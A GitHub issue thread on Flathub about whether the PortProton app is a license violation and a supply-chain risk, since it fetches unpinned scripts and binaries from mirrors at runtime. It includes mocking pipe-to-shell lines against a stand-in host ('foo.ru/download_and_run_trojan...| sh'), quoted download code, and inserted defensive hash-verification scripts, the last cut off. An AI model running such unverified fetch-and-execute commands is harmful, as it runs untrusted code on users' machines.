
License violation and suspicious app on Flathub #5195

Closed
tim77 opened this issue Apr 28, 2024 · 76 comments

Comments

tim77 commented Apr 28, 2024

App: ru.linux_gaming.PortProton

Where is the actual build manifest of this WINE/Proton build? It's a proprietary binary downloaded from an unclear source, and no one even knows how it was built. How is this even published under the MIT license? It's literally basically:

```bash
#!/usr/bin/bash
curl -O https://foo.ru/download_and_run_trojan_on_my_pc.sh | sh
```

How did this even pass the review?

@tim77 tim77 changed the title Licence violation and malicious app on Flathub License violation and malicious app on Flathub Apr 28, 2024
@tim77 tim77 changed the title License violation and malicious app on Flathub License violation and suspicious app on Flathub Apr 28, 2024
@Boria138 commented:

The sources of the PortProton project can be found on GitHub: https://github.com/Castro-Fidel/PortWINE. The custom versions of Proton and Wine with all patches are here: https://github.com/Castro-Fidel/wine_builds. So I consider the claim unfounded.

@Boria138 commented:

The portproton file in Flathub is not a binary, it's a regular bash script that will soon be in upstream. Before accusing people, at least bother to study the information.

tim77 (Author) commented Apr 28, 2024

There are even two different mirrors in the build scripts, one for Russian speakers and one for non-Russians:

```bash
# choose mirror
if [[ -z "$MIRROR" ]] \
&& [[ "$LANGUAGE" == "ru" ]]
then
    echo 'export MIRROR="CDN"' >> "$USER_CONF"
    export MIRROR="CDN"
elif [[ -z "$MIRROR" ]] ; then
    echo 'export MIRROR="GITHUB"' >> "$USER_CONF"
    export MIRROR="GITHUB"
fi
```

@Boria138 commented:

> There are even two different mirrors in the build scripts, one for Russian speakers and one for non-Russians:
>
> ```bash
> # choose mirror
> if [[ -z "$MIRROR" ]] \
> && [[ "$LANGUAGE" == "ru" ]]
> then
>     echo 'export MIRROR="CDN"' >> "$USER_CONF"
>     export MIRROR="CDN"
> elif [[ -z "$MIRROR" ]] ; then
>     echo 'export MIRROR="GITHUB"' >> "$USER_CONF"
>     export MIRROR="GITHUB"
> fi
> ```

The CDN costs money, and not a small amount, so it is used only by Russian users who have problems with GitHub. Also, the mirror can be easily changed. And how did the topic jump to the CDN at all?

tim77 (Author) commented Apr 28, 2024

What exactly does this script download, and from where, and how can we be sure that it is legal and not malicious?

tim77 (Author) commented Apr 28, 2024

What exactly does this script download, and from where, and how can we make sure that it is legal (allowed for redistribution) and not malicious?

@Boria138 commented:

> What exactly does this script download, and from where, and how can we make sure that it is legal (allowed for redistribution) and not malicious?

https://github.com/Castro-Fidel/PortWINE/releases
https://github.com/Castro-Fidel/wine_builds/releases

Here is everything that is used in PortProton; everything on cdn.linux-gaming.ru is the same.

@Boria138 commented:

If the fact that the CDN is only used in a certain country, because it is expensive to use a CDN worldwide, is enough to say that PortProton spreads viruses, then I have nothing to say.

@Boria138 commented:

Absolutely everything in PortProton is 100% open except Steam Runtime Sniper, but it is not used in the flatpak and in general is taken directly from Steam. So once again I repeat: before accusing the PortProton project of something, provide evidence.

tim77 (Author) commented Apr 28, 2024

> What exactly does this script download, and from where, and how can we make sure that it is legal (allowed for redistribution) and not malicious?
>
> https://github.com/Castro-Fidel/PortWINE/releases https://github.com/Castro-Fidel/wine_builds/releases
>
> Here is everything that is used in PortProton; everything on cdn.linux-gaming.ru is the same.

> The portproton file in Flathub is not a binary

Exactly what I wrote in the original post: it's a script which downloads binaries which no one can reproduce, and even from different mirrors:
https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz
The second one, on another mirror, is not even on GitHub and downloads from a .ru domain.

tim77 (Author) commented Apr 28, 2024

> Absolutely everything in PortProton is 100% open

Yeah, except the proprietary blobs from your local PC which are downloaded by your script published on Flathub.

@Boria138 commented:

> > Absolutely everything in PortProton is 100% open
>
> Yeah, except the proprietary blobs from your local PC which are downloaded by your script published on Flathub.

Name at least one proprietary component that you can't look into, please.

@Boria138 commented:

> Exactly what I wrote in the original post: it's a script which downloads binaries which no one can reproduce, and even from different mirrors:

Specifically, this script only downloads the master branch from https://github.com/Castro-Fidel/PortWINE. About the CDN, for the second time I repeat: the separation is done to save money, but at the same time you can change the mirror with one button in the GUI. I guess if the purpose was to infect the computer, then switching to git, where you can see everything, would not be possible.

@Boria138 commented:

(screenshot attached: Screenshot_20240428_234507)

Find the piece of code related to changing mirrors and make sure it's not just a stub.

@Boria138 commented:

> downloads from a .ru domain.

I didn't like this part at all. Why emphasize that the domain is .ru, although it is not hidden and is written literally in the id PortProton? Do you have some kind of personal dislike specifically for Russians?

tim77 (Author) commented Apr 28, 2024

> so once again I repeat: before accusing the PortProton project of something, provide evidence

Please tell me in what reality should I provide evidence, and not you, as the app developer, of how anyone could reproduce your blobs that are downloaded by the script published on Flathub? https://reproducible-builds.org/
I asked you a second time and you still can't give a clear answer to this question.

And how long ago did `curl -O https://foo.ru/download_and_run_trojanblob_on_my_pc.sh | sh` begin to be called open source? And when did it become allowed to be published?

@Boria138 commented:

> > so once again I repeat: before accusing the PortProton project of something, provide evidence
>
> Please tell me in what reality should I provide evidence, and not you, as the app developer, of how anyone could reproduce your blobs that are downloaded by the script published on Flathub? https://reproducible-builds.org/ I asked you a second time and you still can't give a clear answer to this question.
>
> And how long ago did `curl -O https://foo.ru/download_and_run_trojanblob_on_my_pc.sh | sh` begin to be called open source? And when did it become allowed to be published?

The PortProton project is fully open, as are all its scripts. The custom versions of Wine and Proton are easily assembled using the scripts from the wine_builds repository. I don't see any proprietary blobs that you are talking about.

@Boria138 commented:

And as for the evidence: you claim that PortProton is a proprietary product that should not be in Flathub; I prove the opposite using links that show all the sources and the buildbot. Is it not normal for me to demand proof of your words, since at the moment you have not provided sufficient evidence that PortProton is a proprietary product?

@Boria138 commented:

In general, I do not see any point in continuing the dialogue without any real evidence for your accusations, and with possible bias on your part. I suggest waiting for an authorized person from Flathub and only then continuing.

tim77 (Author) commented Apr 28, 2024

> https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz

> The link https://cdn.linux-gaming.ru/PROTON_LG_9-4.tar.xz downloads exactly the same file as from the git

  1. You pointed to a link with precompiled sources, a blob. Before, you stated many times that there aren't any proprietary blobs. I already asked you two times how to reproduce these blobs — no answer.

> downloads exactly the same file as from the git

  2. Should we take your word for it? There are not even any checks in the build process that this downloaded tarball is deterministic. Moreover, by priority, the first attempt is to download from the .ru source and only then from GitHub:

```bash
echo -e "\nTry download scripts from gitlab.eterfund.ru..."
if ! curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
	-L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
	-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
then
	echo -e "\nError.\nTry download scripts from github.com..."
	curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
	-L "https://github.com/Castro-Fidel/PortWINE/archive/refs/heads/master.tar.gz" \
	-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
	[ "$?" != "0" ] && fatal "Critical error during file download!"
fi
echo "Try unpacking scripts..."
tar -xvzf "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz" -C "${PORT_WINE_TMP_PATH}"
```

The contents of this PortWINE-master.tar.gz could be changed at any time. Anything could be added/changed there and it will be impossible to even see the change. It will be impossible to even view and track the commit history, as is possible with GitHub.

@Boria138 commented:

> > https://github.com/Castro-Fidel/wine_builds/releases/download/PROTON_LG_9-4/PROTON_LG_9-4.tar.xz
>
> > The link https://cdn.linux-gaming.ru/PROTON_LG_9-4.tar.xz downloads exactly the same file as from the git
>
> 1. You pointed to a link with precompiled sources, a blob. Before, you stated many times that there aren't any proprietary blobs. I already asked you two times how to reproduce these blobs — no answer.
>
> > downloads exactly the same file as from the git
>
> 2. Should we take your word for it? There are not even any checks in the build process that this downloaded tarball is deterministic. Moreover, by priority, the first attempt is to download from the .ru source and only then from GitHub:
>
> ```bash
> echo -e "\nTry download scripts from gitlab.eterfund.ru..."
> if ! curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
> 	-L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
> 	-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
> then
> 	echo -e "\nError.\nTry download scripts from github.com..."
> 	curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
> 	-L "https://github.com/Castro-Fidel/PortWINE/archive/refs/heads/master.tar.gz" \
> 	-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
> 	[ "$?" != "0" ] && fatal "Critical error during file download!"
> fi
> echo "Try unpacking scripts..."
> tar -xvzf "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz" -C "${PORT_WINE_TMP_PATH}"
> ```
>
> The contents of this PortWINE-master.tar.gz could be changed at any time. Anything could be added/changed there and it will be impossible to even see the change. It will be impossible to even view and track the commit history, as is possible with GitHub.

All the scripts for building Proton are in wine_builds, together with links to the sources. About git I do not understand: how can you change the master downloaded from git? The scripts are not downloaded from the CDN because they are small, so it is not possible to change anything in the process.

tim77 (Author) commented Apr 28, 2024

This app should be removed from Flathub entirely as soon as possible; this fact alone is enough:

```bash
curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
	-L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
	-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
```

@Boria138 commented:

> This app should be removed from Flathub entirely as soon as possible; this fact alone is enough:
>
> ```bash
> curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
> 	-L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
> 	-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
> ```

gitlab.eterfund.ru is just a GitLab instance set up by Etersoft; nothing can be changed there either.

@Boria138 commented:

At the link https://gitlab.eterfund.ru/Castro-Fidel/PortWINE is absolutely the same source code as on GitHub, because it's just a mirror of GitHub: pushes simply go to two places at once, that's all. Again, for the reason I have repeatedly voiced: GitHub in CIS countries works terribly.

@Boria138 commented:

I don't understand: is it not normal practice to divide mirrors by geo for the sake of economy? What makes you think that if a project has three mirrors there are viruses?

tim77 (Author) commented Apr 28, 2024

> I don't understand: is it not normal practice to divide mirrors by geo for the sake of economy? What makes you think that if a project has three mirrors there are viruses?

GOTO 10

@Boria138 commented:

> > I don't understand: is it not normal practice to divide mirrors by geo for the sake of economy? What makes you think that if a project has three mirrors there are viruses?
>
> GOTO 10

How can one change the master branch on the git so that it cannot be traced in any way?

@Boria138 commented:

> Exactly, all these three times means that these blobs no one can reproduce, since this build is non-reproducible. And they are not even built on GitHub infra. These are just proprietary blobs attached on the Release page

The build scripts here https://github.com/Castro-Fidel/wine_builds clone and build Wine; everything is reproducible. And don't mix PortProton and the Wine used in it into one mess; the Wine builds are not on GitLab.

@Boria138 commented:

> gitlab.eterfund.ru (for no reason)

For the thousandth time I explain: GitHub in CIS countries feels terrible, so in the wrapper that downloads all the other scripts when running, GitLab is the priority, because the complaints almost every day that PortProton is not downloading disappeared only when switching to GitLab.

tim77 (Author) commented Apr 28, 2024

> everything is reproducible

Just 5 minutes ago you said exactly the opposite:

> The installation script always downloads the most recent commit in the master because that's how versions work: a commit with a version is a new version, no releases. It's basically a git package, but it's not, because the versions are tested before the commit. I have nothing to check; the master always has a different checksum. I would then have to update the flatpak on every script update, which is quite time consuming.

tim77 (Author) commented Apr 28, 2024

> > gitlab.eterfund.ru (for no reason)
>
> For the thousandth time I explain: GitHub in CIS countries feels terrible, so in the wrapper that downloads all the other scripts when running, GitLab is the priority, because the complaints almost every day that PortProton is not downloading disappeared only when switching to GitLab.

#5195 (comment)

@Boria138 commented:

> > everything is reproducible
>
> Just 5 minutes ago you said exactly the opposite:
>
> > The installation script always downloads the most recent commit in the master because that's how versions work: a commit with a version is a new version, no releases. It's basically a git package, but it's not, because the versions are tested before the commit. I have nothing to check; the master always has a different checksum. I would then have to update the flatpak on every script update, which is quite time consuming.

This is an installation script, and you say that Wine does not reproduce; Wine just calmly builds. Do not mix one with the other.

@Boria138 commented:

You claimed that the versions of Wine and Proton used in PortProton are proprietary and cannot be built, which I pointed out four times is not true. Now the build of Wine and Proton has somehow been mixed up with my words about the installation script; how is this related?

tim77 (Author) commented Apr 28, 2024

> You claimed that the versions of Wine and Proton used in PortProton are proprietary and cannot be built

Please quote me: when and where did I claim that?

#5195 (comment)

@Boria138 commented:

> > You claimed that the versions of Wine and Proton used in PortProton are proprietary and cannot be built
>
> Please quote me: when and where did I claim that?
>
> #5195 (comment)

PortProton has no binary except for Wine and Proton, so the only thing that cannot be reproduced is the assembly of Wine and Proton. Everything else is bare bash scripts that are not assembled and, most importantly, are downloaded separately, not inside the flatpak.

@Boria138 commented:

For the millionth time I repeat: in Flathub there is only a wrapper that downloads scripts; there is nothing even assembled. Just this wrapper in /app/bin/ is copied, and it in turn downloads the scripts itself. The wrapper is here: https://github.com/flathub/ru.linux_gaming.PortProton/blob/master/portproton. It does nothing illegal; it just downloads scripts and then runs setup from here: https://github.com/Castro-Fidel/PortWINE/blob/master/data_from_portwine/scripts/setup.sh. That's the whole scheme.

@Boria138 commented:

Should I, specifically for the flatpak, not download from GitLab and get a bunch of problems, or what?

tim77 (Author) commented Apr 28, 2024

> PortProton has no binary except for Wine and Proton

Seriously? Here is the full tree of the Wine blob provided by you: portproton-tree.txt
There are thousands of .dll and .so files and 6 binary files just in the /bin dir, maybe more somewhere else.

Also, I am not an expert in Wine builds, but as far as I know it is in general impossible to make deterministic builds of WINE itself (yet). So maybe you can teach everyone else how you achieved this?

Or what will you say if this also turns out to be untrue? It's easy to check. Everyone could check this if brave enough to run `curl | malware.sh` on their machine.

Also, if your Wine builds are reproducible, as you said, why do you not build them on GitHub with Actions, or on Flathub infra, which is even more correct?

tim77 (Author) commented Apr 28, 2024

> it in turn downloads the scripts itself. The wrapper is here: https://github.com/flathub/ru.linux_gaming.PortProton/blob/master/portproton. It does nothing illegal; it just downloads scripts and then runs setup from here: https://github.com/Castro-Fidel/PortWINE/blob/master/data_from_portwine/scripts/setup.sh. That's the whole scheme.

No, it downloads the scripts not from there, but from here:

```bash
echo -e "\nTry download scripts from gitlab.eterfund.ru..."
if ! curl -f -# -A "Mozilla/5.0 (compatible; Konqueror/2.1.1; X11)" -H 'Cache-Control: no-cache, no-store' -H 'Pragma: no-cache' \
	-L "https://gitlab.eterfund.ru/Castro-Fidel/PortWINE/-/archive/master/PortWINE-master.tar.gz" \
	-o "${PORT_WINE_TMP_PATH}/PortWINE-master.tar.gz"
```

This is hilarious, how you are still trying to obfuscate this fact. The question is why?

@Boria138 commented:

> This is hilarious, how you are still trying to obfuscate this fact. The question is why?

Right, I'm trying so hard to hide this fact that all of this can be found out from the script, which is not encrypted at all on Flathub, and gitlab.eterfund.ru itself is fully publicly available. It is really hilarious. Don't you think that if I had a desire to hide something I would, for example, close the repository to viewing, allowing only downloading master.tar.gz from there, and that's it? Don't get involved in substitution of notions. Why GitLab is the priority I've written many times; there is no other reason.

@Boria138 commented:

> Seriously? Here is the full tree of the Wine blob provided by you: portproton-tree.txt
> There are thousands of .dll and .so files and 6 binary files just in the /bin dir, maybe more somewhere else.

And all of them are from Wine and Proton. Open a regular Proton and you'll get about the same list, so what does that tell you?

@Boria138 commented:

> Also, I am not an expert in Wine builds, but as far as I know it is in general impossible to make deterministic builds of WINE itself (yet). So maybe you can teach everyone else how you achieved this?

Glorious Eggroll, who builds Proton GE via GitHub Actions, I take it has not achieved this either? The only reason why we don't have an autobuild is because it's not needed: GitHub builds Proton in two hours, locally it takes 15 minutes to build it.

@Boria138 commented:

> Or what will you say if this also turns out to be untrue? It's easy to check. Everyone could check this if brave enough to run `curl | malware.sh` on their machine.

Run it on a virtual machine or just look at the code of what happens in these scripts. It's easy to accuse a person of something while constantly finding stupid excuses. I gave you a link with all the tools and sources; if you are afraid to run them, then I have nothing to say. I do not hide anything.

@Boria138 commented:

| File | MD5 |
|---|---|
| functions_helper | a2eec09bdb3da77d11705b62b0f4b472 |
| start.sh | a26a4f391c87981c461206b9bf144a43 |
| setup.sh | ce31dee5f1bd94ea17b00e5a17051423 |
| var | dbc876f9080e94c25352592dd88789d7 |
| add_in_steam.sh | f5a2fe3ba44f3b832f4beac2e44009f6 |
| credits | e3bb6905cba27cb0c9b2a1164cc50230 |

Here is a list of all the main script files and their MD5 sums; you can do a git clone from GitHub and from GitLab and make sure that the sums of these files do not differ.
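An added example, not code from PortProton or from anyone in this thread: instead of comparing a hand-picked list of MD5 sums by eye, two checkouts of the same scripts (one from GitHub, one from a mirror) can be compared file by file with SHA-256, covering every regular file in both trees and reporting paths that differ or are missing on one side. The directory names and file contents in the demonstration are constructed.

```shell
# Added example, not PortProton's code: compare two checkouts of the same
# scripts (one from GitHub, one from a mirror) file by file with SHA-256.
# Every regular file in the tree is covered, not just a hand-picked list.
# The directories under $demo are constructed for the demonstration.

# tree_sums DIR: print "sha256  relative/path" for every regular file, sorted,
# so that two trees can be compared with plain diff.
tree_sums() {
    ( cd "$1" && find . -type f | sort | while read -r f; do
        printf '%s  %s\n' "$(sha256sum "$f" | cut -d' ' -f1)" "${f#./}"
    done )
}

# compare_trees DIR_A DIR_B: succeed only if both trees hold identical files
# with identical contents; otherwise list the differing or missing paths.
compare_trees() {
    a=$(mktemp); b=$(mktemp)
    tree_sums "$1" > "$a"
    tree_sums "$2" > "$b"
    diff "$a" "$b" | sed -n 's/^[<>] [0-9a-f]*  //p' | sort -u
    if cmp -s "$a" "$b"; then status=0; else status=1; fi
    rm -f "$a" "$b"
    return "$status"
}

# count_differences DIR_A DIR_B: number of paths that differ (0 means identical).
count_differences() {
    compare_trees "$1" "$2" | wc -l | tr -d ' '
}

# Offline demonstration with two constructed checkouts.
demo=$(mktemp -d)
mkdir -p "$demo/github/scripts" "$demo/mirror/scripts"
printf 'echo start\n' > "$demo/github/scripts/start.sh"
printf 'echo start\n' > "$demo/mirror/scripts/start.sh"
printf 'VERSION=1\n' > "$demo/github/var"
printf 'VERSION=2\n' > "$demo/mirror/var"   # the mirror serves a changed file
if compare_trees "$demo/github" "$demo/mirror"; then
    echo "trees identical"
else
    echo "trees differ in $(count_differences "$demo/github" "$demo/mirror") file(s)"
fi
rm -rf "$demo"
```

The comparison covers file contents only; it does not check permissions or symlinks, and it says nothing about whether either tree matches what a given commit in the repository history contains.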

tim77 (Author) commented Apr 29, 2024

> > Also, I am not an expert in Wine builds, but as far as I know it is in general impossible to make deterministic builds of WINE itself (yet). So maybe you can teach everyone else how you achieved this?
>
> Glorious Eggroll, who builds Proton GE via GitHub Actions, I take it has not achieved this either?

You, as a Wine/Proton "developer", ask me about this? 😆 You just said in an earlier message that your "scripts clone and build wine everything is reproducible", and now you are saying that you take binary artifacts of Proton-GE. What's going on? Do you even understand what a reproducible build from sources is? And how many times will I catch your false statements and attempts at strawmanning? You yourself don't know and don't understand what's happening in your build process, confused in your bash scripts? Which download another bash script, which downloads another bash script from a foo.ru source without any user prompt, without any checks during the download process. Which downloads non-reproducible binary artifacts under a non-MIT license. And after that downloads binary files from your local machine!

I don't see any of these license files and notices in your PortWINE-master.tar.gz. Any of them:

> Copyright (c) 2018-2022, Valve Corporation
> All rights reserved.
>
> Redistribution and use in source and binary forms, with or without modification,
> are permitted provided that the following conditions are met:
>
> 1. Redistributions of source code must retain the above copyright notice, this
> list of conditions and the following disclaimer.
>
> 2. Redistributions in binary form must reproduce the above copyright notice,
> this list of conditions and the following disclaimer in the documentation and/or
> other materials provided with the distribution.
>
> 3. Neither the name of the copyright holder nor the names of its contributors
> may be used to endorse or promote products derived from this software without
> specific prior written permission.

  • WINE itself is under the LGPL 2.1 license.
  • DXVK is licensed under the zlib/libpng license.
  • vkd3d-proton is: Copyright 2016-2022 the vkd3d-proton project authors

and many, many more, see https://github.com/GloriousEggroll/proton-ge-custom/blob/master/dist.LICENSE

GloriousEggroll provided the full build process in his git project with all the necessary license files. GloriousEggroll does not download during the build process any new unverified tarballs with a bunch of scripts WITHOUT ANY USER PROMPT, into which everything and anything could be added on the fly WITHOUT ANY WAY to even notice the difference. All his changes in the build process can be tracked and verified normally via the regular git commit history. He provided the full build process from sources in his GitHub project. And he also provides build artifacts on trusted infra, built on GitHub. Not from his localhost. Do you even understand the difference?

In what reality is such an app allowed to be published under the MIT license when it heavily depends on many other things licensed under non-MIT licenses? When non-reproducible binaries from a user's local machine, of which it is unknown how and by whom they were built, when even their author himself does not understand how they are built, are called open source and published under the MIT license? I am not even talking about a trusted, safe build project here.

> The only reason why we don't have an autobuild is because it's not needed: GitHub builds Proton in two hours, locally it takes 15 minutes to build it.

Wait, what? You just said that you are not building it properly on trusted infra like GitHub or Flathub because it takes 2 hours to build? And that's the reason why you build it on your local machine, seriously? I've never heard such nonsense before. So all of us who build software on trusted infra like that provided by Linux distributions or Flathub or GitHub are all idiots, maybe, in your opinion? Especially big projects like Chromium, the build process of which can take a day or more. And all these requirements and rules for packaging trusted and safe FOSS software do not apply to you?

Nowadays everyone can publish on Flathub a bash script with
`curl -O https://foo.ru/download_and_patch_adobe_photoshop_no-trial.sh | sh` under the MIT license and it will be flagged as trusted and free, Community built ❤️👍? What's going on?

tim77 (Author) commented Apr 29, 2024

> | File | MD5 |
> |---|---|
> | functions_helper | a2eec09bdb3da77d11705b62b0f4b472 |
> | start.sh | a26a4f391c87981c461206b9bf144a43 |
> | setup.sh | ce31dee5f1bd94ea17b00e5a17051423 |
> | var | dbc876f9080e94c25352592dd88789d7 |
> | add_in_steam.sh | f5a2fe3ba44f3b832f4beac2e44009f6 |
> | credits | e3bb6905cba27cb0c9b2a1164cc50230 |
>
> Here is a list of all the main script files and their MD5 sums; you can do a git clone from GitHub and from GitLab and make sure that the sums of these files do not differ.

At this point it's clear you are either completely incompetent and ignorant, or you are doing this intentionally to hide the fact that your goal is to install malware on users' machines. Here we go again.

Neither I nor anyone else needs your MD5 sums in such forum talks. What we all need is for all these checks to be in the build process, like everyone does. Fulfill all the requirements for the build, after which it can only then be called trusted and safe. But you have not even tried to fix this. Instead you tried to convince us that downloading a random unverified tarball with scripts and executable files every time, on every launch of portproton, without a user prompt — is OKay!

Anyone else would never even publish something like this publicly, such hello_world bash scripts of kiddies. It's a shame.

tim77 (Author) commented Apr 29, 2024

Facts:

  • PortWINE-master.tar.gz contains executables and is downloaded from a non-trusted source outside the Flathub/GitHub infra. Every time, without a user prompt. There is no way to notice any difference or track changes in this tarball, because it doesn't have any checks like:

    • GPG signature
    • Hash sum checks
    • A fixed git commit version which could be tracked and verified by anyone via the git commit history
    • It downloads from a non-trusted source that Flathub administrators do not have access to
    • It does not prompt and show the user what changes were made in this update, like AUR helpers showing diffs, for example, in Arch Linux.
  • The app is published under the MIT license but heavily depends on many other things licensed under non-MIT licenses, including some pretty restrictive requirements.

  • It downloads and depends on 3rd-party binary artifacts.

  • It downloads non-reproducible binaries from a user's local machine, of which it is unknown how and by whom they were built, when even their author himself does not understand how they were built.

  • After trying to clarify with the author of portproton how we can trust and be sure that everything is legal, allowed for redistribution and not malicious, the author said we have to take his word for it instead of fixing all the issues. There are absolutely zero reasons for downloading this malicious tarball every time on every app launch, or for why this bash script couldn't be published on GitHub or Flathub itself. It could even be automated via a Flathub bot which could automate the whole process and build and publish every new commit in upstream with these bash scripts.

  • All this is published in Flathub under the MIT license, with verified status and a Community built ❤️👍 badge. When WINE is ported to Wayland, and if the author of portproton figures out one day how to remove the --filesystem=host restriction, then the app will moreover be marked "Safe" on the Flathub store page. This is hilarious. It is called open source nowadays. Flathub will never be and will not even come close to the usual rpm/deb/arch.tar.zst/etc package quality and safety, security of official Linux distro repositories, unfortunately.
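An added example, not code from PortProton, Flathub or anyone in this thread: the checks the list above asks for, a pinned commit instead of a moving branch and a hash check before anything is unpacked, written as small POSIX shell functions. The repository URL, commit id and expected hash passed to `install_pinned` are placeholders (the `archive/<commit>.tar.gz` URL layout is assumed to be the GitHub one); the demonstration at the end uses a constructed archive and runs offline.

```shell
# Added example, not the project's code. Pin the download to one immutable
# commit and verify a SHA-256 recorded in the manifest before unpacking, so
# that a mirror serving different bytes for the "same" archive is rejected.
# Repository URL, commit and hash are placeholders supplied by the caller.

# verify_sha256 FILE EXPECTED_HEX: succeed only if FILE hashes to EXPECTED_HEX.
verify_sha256() {
    actual=$(sha256sum "$1" | cut -d' ' -f1)
    [ "$actual" = "$2" ]
}

# unpack_verified ARCHIVE EXPECTED_HEX DEST: extract only after the hash matches;
# nothing is written to DEST when it does not.
unpack_verified() {
    if ! verify_sha256 "$1" "$2"; then
        echo "refusing to unpack $1: SHA-256 mismatch" >&2
        return 1
    fi
    mkdir -p "$3" && tar -xzf "$1" -C "$3"
}

# fetch_pinned REPO_URL COMMIT OUT: download the archive of one specific commit
# (never a moving branch such as master). There is deliberately no fallback to
# a second mirror: if the pinned bytes are unavailable, the install fails loudly.
fetch_pinned() {
    curl -fsSL "$1/archive/$2.tar.gz" -o "$3"
}

# install_pinned REPO_URL COMMIT EXPECTED_HEX DEST: the whole flow.
install_pinned() {
    tmp=$(mktemp -d) || return 1
    if fetch_pinned "$1" "$2" "$tmp/src.tar.gz" \
       && unpack_verified "$tmp/src.tar.gz" "$3" "$4"; then rc=0; else rc=1; fi
    rm -rf "$tmp"
    return "$rc"
}

# Offline demonstration with a constructed archive (no network needed).
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/src"
printf 'echo hello\n' > "$demo_dir/src/start.sh"
tar -czf "$demo_dir/good.tar.gz" -C "$demo_dir" src
good_hash=$(sha256sum "$demo_dir/good.tar.gz" | cut -d' ' -f1)   # value a manifest would record
unpack_verified "$demo_dir/good.tar.gz" "$good_hash" "$demo_dir/out" && echo "verified: unpacked"
# A mirror that serves an archive with one changed line fails the same check.
printf '# changed on the mirror\n' >> "$demo_dir/src/start.sh"
tar -czf "$demo_dir/bad.tar.gz" -C "$demo_dir" src
unpack_verified "$demo_dir/bad.tar.gz" "$good_hash" "$demo_dir/out2" || echo "changed archive rejected"
rm -rf "$demo_dir"
```

Pinning a commit plus a hash gives reviewers something to diff between updates; a signature over the archive would additionally tie it to a publisher, which a bare hash in the same script does not.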

razzeee (Member) commented Apr 29, 2024

> Flathub will never be and will not even come close to the usual rpm/deb/arch.tar.zst/etc package quality and safety, security of official Linux distro repositories, unfortunately.

FYI, it would be marked as Safe from other sources too; I would even expect that to be the case sooner, as rpm/deb are known to overwrite the actual permission checks.

tim77 (Author) commented Apr 29, 2024

> > Flathub will never be and will not even come close to the usual rpm/deb/arch.tar.zst/etc package quality and safety, security of official Linux distro repositories, unfortunately.
>
> FYI, it would be marked as Safe from other sources too; I would even expect that to be the case sooner, as rpm/deb are known to overwrite the actual permission checks.

No, it will not. But not for the reason you mentioned. This "app" will never be in other high quality, trusted sources, because no mainstream Linux distro allows such stuff to be packaged in an official repo. There is no portproton in Arch Linux, for example. And not without reason. Only in the AUR, and the AUR is:

> If a package becomes popular enough — provided it has a compatible license and good packaging technique — it may be entered into the extra repository (directly accessible by pacman or from the Arch build system).

> Warning: AUR packages are user-produced content. These PKGBUILDs are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.

No respectable source would ever allow such things to be distributed and published.

razzeee (Member) commented Apr 29, 2024

Please read what I've said. It was a general statement and not connected to this app.

bbhtt (Contributor) commented May 28, 2024

Any app with network access (--share=network) can and may, at runtime, download random files over the internet like it or not without any implications. The comparison with distro packages does not work because at least with flatpak you can revoke network access which is not possible on fully unsandboxed apps. If you feel unsafe about an app connecting to network, you can revoke that permission by flatpak override or Flatseal.

I agree that the custom wine and proton builds are better placed in the manifest instead of scripts in repo, but it's not possible to enforce that because wine and proton are too unstable and each apps/game require their own patches/version. There are also other applications like Steam and Bottles etc. doing similar things like downloading custom proton builds at runtime on user interaction. So we would need block them too and review every single code change/update of all apps to ensure they don't do something similar. This is not possible.

Now about the licensing situation @Boria138:

  1. Please try to include any original copyright or license notices in /app/share/licenses/<component_name>.
  2. If a license prohibits redistribution of that component, you can use it as an extra-data source https://docs.flatpak.org/en/latest/module-sources.html#extra-data
  3. You can use conditionals like License A AND License B in the license tag of appstream if that is required https://docs.flathub.org/docs/for-app-authors/metainfo-guidelines/#license

We don't have the manpower or the legal expertise to determine what the final license should be when so many custom licenses are involved. But it is best to include the original license and to not modify the libraries in such cases.

https://github.com/Castro-Fidel/PortWINE/releases
https://github.com/Castro-Fidel/wine_builds/releases

Here is everything that is used in PortProton; everything the same is on cdn.linux-gaming.ru.

@Boria138 Please document these in the readme here https://github.com/flathub/ru.linux_gaming.PortProton and how the tarball you are shipping is created.

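The mitigation bbhtt describes (check whether an app declares network access, then revoke it per-user with `flatpak override` rather than trusting the app) can be scripted. The following is an added example, not code from the issue or from the PortProton project. The permissions text is a constructed sample in the format `flatpak info --show-permissions` prints; the real app's declaration may differ, and the app id is used only as an illustration.

```shell
#!/usr/bin/env bash
# Added example: audit an app's declared permissions for network access and
# produce the per-user override that removes it. Not part of the issue or of
# the PortProton project. SAMPLE_PERMISSIONS is a constructed sample.

SAMPLE_PERMISSIONS='[Context]
shared=network;ipc;
sockets=x11;wayland;pulseaudio;
devices=dri;
filesystems=xdg-download;
'

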